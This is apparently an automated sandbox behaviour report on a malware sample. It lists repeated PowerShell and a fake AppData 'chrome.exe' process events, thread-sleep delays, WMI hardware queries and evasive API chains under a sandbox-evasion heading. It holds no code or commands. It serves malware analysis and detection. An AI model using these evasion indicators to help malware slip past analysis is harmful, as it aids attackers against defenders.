Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController  (2 identical entries)
Source: C:\Users\user\AppData\Roaming\34432.exe  TID: 6972  Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Roaming\34432.exe  TID: 6972  Thread sleep time: -68000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 7116  Thread sleep count: 5547 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 7112  Thread sleep count: 3401 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 3684  Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 6780  Thread sleep count: 5587 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 6772  Thread sleep count: 2582 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 4120  Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  TID: 2296  Thread sleep count: 989 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  TID: 3724  Thread sleep count: 137 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 5248  Thread sleep count: 2928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 2596  Thread sleep count: 272 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 6600  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 480  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe  TID: 3296  Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe  TID: 3296  Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe  TID: 6828  Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe  TID: 6828  Thread sleep time: -77000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 2912  Thread sleep count: 3963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 1368  Thread sleep count: 581 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 1344  Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 5384  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 5340  Thread sleep count: 1048 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 5340  Thread sleep count: 151 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 7148  Thread sleep count: 63 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TID: 4180  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Last function: Thread delayed  (2 identical entries)
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe  Last function: Thread delayed  (2 identical entries)
Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe  Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe  Last function: Thread delayed  (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5547Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3401Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5587Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2582Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 989
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3963
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 581
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1048
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_39-6467
Source: C:\Windows\System32\lsass.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
